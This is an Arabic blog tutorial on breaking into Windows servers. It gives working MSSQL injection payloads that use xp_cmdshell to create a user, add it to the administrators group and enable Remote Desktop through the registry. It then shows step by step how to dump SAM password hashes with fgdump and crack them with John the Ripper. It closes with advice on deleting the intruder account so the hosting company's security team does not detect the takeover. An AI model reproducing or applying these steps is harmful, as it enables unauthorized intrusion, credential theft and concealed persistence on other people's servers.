إرشاد المخترق الباسل إلى السيطرة على سيرفر الويندوز الفاشل

اليوم إن شاء الله تعالى موضوعنا تحت عنوان
إرشاد المخترق الباسل إلى السيطرة على سيرفر الويندوز الفاشل
أولا سيتم قدر الإمكان إحتواء جميع الجوانب التي تَمٌت بصلة إلى هذا الموضوع

وفي الأخير نشير إلى أفضل طريقة التي أراها مناسبة إستنادا إلى خبرتي البسيطة في التعامل

مع هذا الموضوع و أسباب ذلك


تدور محاور هذا الموضوع بشكل أساسي حول جلب كلمة أو كلمات السرّ المخزنة في نظام
الويندوز الخاصة بالمستخدمين مثل الإداريين و المستعملين

وهنا لابد لنا أن نفهم كيف يخزن الويندوز كلمات السر الخاصة بالنظام
وهذا هو أول محور نبدأ به إن شاء الله تعالى

ولعل أول سؤال يتبادر إلى ذهن القارئ
أين يخبئ الويندوز الباسوورد passwords و يحتفظ بها ؟؟؟




بداية من نظام ويندوز 2000 وحتى الآن إعتمدت مايكروسوفت على إستخدام تقنية NT وفي هذه التقنية يتم حفظ جميع كلمات السر لجميع حسابات الويندوز بطريقة مشفرة بتشفير يسمي LM Hash في ملف يسمي
SAM : Security Account Manager

أولا سوف أعطي نبدة عن : ماهو SAM File

هو ملف موجود في نظام windows بالضبط في المسار :

C:\WINDOWS\system32\config

والذي يحتوي على جميع كلمات السر المتواجدة بجهازك ... انظر الصورة
أضغط هنا لتكبير الصورة , مقاس الصورة الأصلي 800x363 وحجمها 82KB.


حيث لا يمكن نسخ الملف أو حذفه أو نقله من داخل الويندوز -جرب بنفسك على جهازك وسترى- مع ملاحظة أن أقصى طول للباسوورد هو 14 حرف و ملاحظة أن التشفير يتم بطريقة معينة حيث يتم تقسيم الباسوورد إلى جزئين وكل جزء بمستوى معين من التشفير .
في ويندوز فيستا قامت ويندوز بإلغاء الإعتماد علي LM و إعتمدت بشكل أساسي علي طريقة أخرى وهي NTLM وهي أصعب من LM لكن في الباسووردات الضعيفة يمكن كسرها بسهولة .


المحور الثاني
هناك عدة برامج تقوم بإلغاء باسوورد أي حساب في الويندوز بما فيها حساب الأدمن وهي طريقة فعالة جدا لمن نسي الباسوورد لكنها ليست طريقة فعالة للمستخدمين الآخرين لأن الأدمن سيعلم بالطبع أن الباسوورد تم حذفه لكن الحل الأمثل هو معرفة الباسوورد و إستخدامها وهذا بالطبع يفيد أكثر فمثلا في الشبكات حيث يوجد أدمن لجميع الأجهزة وتكون في الغالب نفس الباسوورد فإن معرفة باسوورد أحد الأجهزة سيجعلك تعرف الباقي.

طرق كسر الباسوورد
هناك عدة طرق لجلب باسورد الويندوز سأقوم بذكرها فقط دون التطرق لشرحها و أبين في الأخير ما هي أفضل طريقة

طرق كسر الباسوورد

Dictionary Attack


Brute Force Attack


Rainbow Tables


Ophcrack



Online Cracking


Cain &Abel

كل هذه الطرق فعالة عندما يكون التعامل مع جهاز أمامك لكن تكون المهمة صعبة أو شبه مستحيلة لما نتعامل مع سيرفر ويندوز و ذلك للأسباب التالية:

-أغلب هذه البرامج يقوم بتخمين الباسوورد عن طريق القاموس و ينجح فقط في حالة الباسووردات الضعيفة ويتميز بالسرعة العالية و يجب أن تكون كلمة السر موجودة في ال Word list’s حتى يتم كسرها.

-أغلب هذه البرامج يقوم بتجربة كل الباسووردات المعتادة, وينجح في معظم الأحوال ولكنه يأخذ وقت طويل جدا جدا من أجل الوصول إلى نتائج و بالرغم من أن النتائج تعتبر مضمونة إلا أنه يعتبر من المستحيل كسر الباسووردات القوية والأكثر من سبعة حروف بهذه الطريقة حيث تأخذ وقت طويل جدا و لكن الباسووردات أقل من سبعة حروف يتم كسرها وحسب قوتها في حدود يومين على الأكثر حسب إمكانيات الجهاز المستخدم.

-إستخدام Brute Force لكن و حتى يتم تقليل الوقت جمعت كافة الباسووردات الممكنة في جداول مرتبة منظمة لتسهيل عملية البحث وهي أكثر الطرق فعالية و تنجح بنسبة كبيرة جدا و لكن لإستخدام هذه الطريقة يجب أن يكون لديك الجداول والتي يمكن تحميلها من بعض المواقع التي تقدم هذه الخدمة مجانا لكن بالطبع يعتبر هذا أمر صعب جدا لأن حجم هذه الجداول كبير جدا جدا وهناك بعض المواقع المجانية التي تقدم خدمة فك الهاش مجانا ولكن عليك إنتظار دورك في الصف .

-نقف وقفة مع برنامج
Ophcrack
وهو تطوير لفكرة Rainbow Tables وتتميز بالسرعة الفائقة في كسر أي باسوورد في ثواني قليلة و يتميز أيضا بالتحديث المستمر ولكن الجداول غير مجانية ولكن توجد أسطوانة لايف مجانية تحوي بعض هذه الجداول لكن الجداول الأصلية يمكنها كسر أكثر من 99% من الهاش و بسرعة كبيرة . لكن في تعقيب سابق على موضوع الأخ Cyclone الذي تطرق فيه الى برنامج Ophcrack عقبت على الأخ Islam_Lee حول عدم جدوى البرنامج مع السيرفرات لغياب قارئ الأقراص .

إذن فلا بد من وجود حل لكل هذه العقبات

فبعد كل هذا التمهيد نأتي الآن إلى اسدال الستار عن الطريقة المثلى في جلب باسورد
الويندوز بطريقة إحترافية

الطريقة تتمثل في استعمال أداة بسيطة و خفيفة تمكن من نسخ الهاشات المتواجدة داخل SAM File

إسمهاعفواً لايمكن عرض الرابط إلا بعد الرد على الموضوع

و بعدها نقوم بفك تلك الهاشات بواسطة

عفواً لايمكن عرض الرابط إلا بعد الرد على الموضوع

المحور الثالث
قبل البدأ نشرح بإيجاز أحد طرق إختراق سيرفرات الويندوز و طريقة إضافة USER

أسهل هذه الطرق هي ثغرات الحقن MSSQL INJECTION

عند إيجاد موقع مصاب

نقوم بحقنه

بهذا الأمر


كود PHP:
?id=1;exec%20master..xp_cmdshell 'net user عفواً لايمكن عرض الرابط إلا بعد الرد على الموضوع /add';--

يضيف يوزر إسمه عفواً لايمكن عرض الرابط إلا بعد الرد على الموضوع والباس عفواً لايمكن عرض الرابط إلا بعد الرد على الموضوع



كود PHP:
?id=1;exec%20master..xp_cmdshell 'net localgroup administrators عفواً لايمكن عرض الرابط إلا بعد الرد على الموضوع /add';--

وهذا الأمر يضيف اليوزر الذي إسمه
عفواً لايمكن عرض الرابط إلا بعد الرد على الموضوعلمجموعة administrators

لكن 90% من السيرفرات عاملة disable لـــ remote desktop

ثانيا لو كانت مفعلة تكون داخل الشبكة فقط للحماية

لكن هناك حل لهذه المشكلة و هو إعادة تفعيل remote desktop عن طريق هذه الحقنة



كود PHP:
?id=1'; EXEC sp_configure 'show advanced options',1 ; RECONFIGURE ; EXEC sp_configure 'xp_cmdshell',1 ; RECONFIGURE ; exec master..xp_cmdshell 'net user عفواً لايمكن عرض الرابط إلا بعد الرد على الموضوع osoud.org/add'; exec master..xp_cmdshell 'net localgroup administrators عفواً لايمكن عرض الرابط إلا بعد الرد على الموضوع/add'; EXECUTE master.dbo.xp_regwrite N'HKEY_LOCAL_MACHINE',N'SYSTEMCurrentControlSetControlTerminal Server',N'fDenyTSConnections',N'REG_DWORD,0;--

سيتم تحقيق الأهداف التالية :

1-تفعيل XP_CMDSHELL في حال تم تعطيله (SQL 2005 يعطل ذلك افتراضيا)

2-إضافة مستخدم المسمى " عفواً لايمكن عرض الرابط إلا بعد الرد على الموضوع
" مع كلمة السر "osoud.org" في قاعدة بيانات السيرفر

المستهدف

3-إضافة المستخدم "hacker" إلى مجموعة المسؤولين "المحلية" على قاعدة بيانات

السيرفر المستهدف

المحور الرابع

نعود الأن إلى صلب الموضوع وهو الإتصال بالسيرفر و سحب كلمات السر

الخطوة الأولى وهي الإتصال عن بعد بإستخدام Rdesktop

الخاص بالـ Linux على توزيعة BackTrack 4
أضغط هنا لتكبير الصورة , مقاس الصورة الأصلي 670x444 وحجمها 32KB.



تم الدخول
أضغط هنا لتكبير الصورة , مقاس الصورة الأصلي 802x602 وحجمها 32KB.


نقوم بفتح المتصفح ونحمل برنامج john The Ripper 171

عبر الرابط المُعد مسبقاً
أضغط هنا لتكبير الصورة , مقاس الصورة الأصلي 802x602 وحجمها 50KB.


ثم أداة الـــ Fgdump
أضغط هنا لتكبير الصورة , مقاس الصورة الأصلي 802x602 وحجمها 37KB.


بعد إنتهاء التحميل نقوم بفك الضغط عن كلا الملفين

كل برنامج في مجلد خاص به كما هو موضح في الصورة

الخطوة الموالية هي جلب الهاشات من ملف SAM عن طريق أداة Fgdump

نفتح موجه الأوامر Command Prompt

وندخل إلى المجلد الذي يحتوي على الــ Fgdump

مثلا في هذه الحالة C:\Dowloads\fgdump\Release

بتنفيذ الأمر fgdump.exe -c

C:\Dowloads\fgdump\Release>fgdump.exe -c

بمجرد الضغط على Enter تبدأ الأداة بجلب الهاشات بسرعة فائقة لا تتجاوز ثانية أو ثانيتين

وظهور رسالة Passwords Dumped successfully

ما يعني نجاح سحب الهاشات من النظام



ستلاحظ عند فتح مجلد الأداة على المسار C:\Dowloads\fgdump\Release

ظهور ملف جديد إسمه 127.0.0.1.pwdump


الذي يحتوي على جميع الهاشات

لو أردنا أن نشاهد محتوى هذا الملف و رؤية الهاشات فيمكننا ذلك

كما هو موضح في الصورة الموالية



نقوم بنسخ 127.0.0.1.pwdump
أضغط هنا لتكبير الصورة , مقاس الصورة الأصلي 802x602 وحجمها 40KB.


و لصقه داخل مجلد برنامج الــ john

على المسار C:\Downloads\john171w\john1701\run

كما هو موضح في الصورة
أضغط هنا لتكبير الصورة , مقاس الصورة الأصلي 802x602 وحجمها 45KB.


ثم نفتح مرة ثانية موجه الأوامر Command Prompt

وندخل على مجلد برنامج الــ john من أجل فك الهاشات الموجودة داخل ملف

127.0.0.1.pwdump

على المسار

C:\Downloads\john171w\john1701\run

بتنفيذ الأمر

john-386.exe 127.0.0.1.pwdump

هكذا

C:\Downloads\john171w\john1701\run>john-386.exe 127.0.0.1.pwdump
أضغط هنا لتكبير الصورة , مقاس الصورة الأصلي 812x634 وحجمها 28KB.


بعد ثواني قليلة تبدأ الأداة في فك الهاشات بسرعة كبيرة و قد تستغرق بعضها بضع ساعات أو أكثر على حسب قوة الباسوررد
أضغط هنا لتكبير الصورة , مقاس الصورة الأصلي 812x634 وحجمها 47KB.


في حالة ما تم فك الهاش المطلوب خاصة هاش المدير العام

أود توضيح نقطة معينة ستجد في بعض الأحيان أن نفس الإسم يظهر مرتين و أمامه باس مختلف

بهذا الشكل

كود PHP:
SABER (saber) me@ (admin:2) find12 (user:1) 123456 (cowboy) 3 (user:2) word (Administrator:2) 1ted (cool:2) mypass (Administrator:1) not001 (admin:1) loseE00 (cool:1)

لاحظ معي على سبيل المثال Administrator يوجد (Administrator:1) و (Administrator:2) و كل واحد أمامه باس مختلف عن الأخر

لكي أحصل على الباس النهائي أجمع 1+2 بهذا الشكل

(Administrator:1) زائد (Administrator:2) يساوي mypass زائد word إذن

Administrator =mypassword

أما اليوزر الذي ليس بجنبه رقم فالباسوورد الذي يقابله هو النهائي مثل SABER (saber)

الآن وبعدما تم الحصول على باسورد الأدمن الرئيسي يجب علينا أن نحذف اليوزر الذي دخلنا

به في بادئ الأمر لأن هدفنا هنا هو الإحتفاظ بالسيرفر و الإستفادة منه لأطول مدة ممكنة

لأنه لو تركنا اليوزر فسوف يكتشف فريق الأمن الخاص بالسيرفر أو شركة الإستضافة أمرك و

يقمون يتغيير كلمات السر و يضيع منك السيرفر.

والسبيل إلى ذلك بغاية البساطة...تابع...

من

start >>>run

أكتب داخل خانة الــ run



كود PHP:
control passwords2


كما هو ملاحظ في الصورة



ستظهر لك نافذة جديدة إسمها User accounts


يمكنك من خلالها إضافة يوزر جديد أو تغيير كلمة سر أي مستخدم أو حذفه

كما هو موضح في الصورة


ثم تقوم بإختيار إسم المستخدم الذي قمت بالدخول به في بادئ الأمر ثم تضغط على حذف

remove

شاركني رأيك

صفحتنا على الفيسبوك

Flag Counter

Navigation-Menus (Do Not Edit Here!)

Social Icons

مدونات صديقة

Subscribe Via Email (Do Not Edit Here!)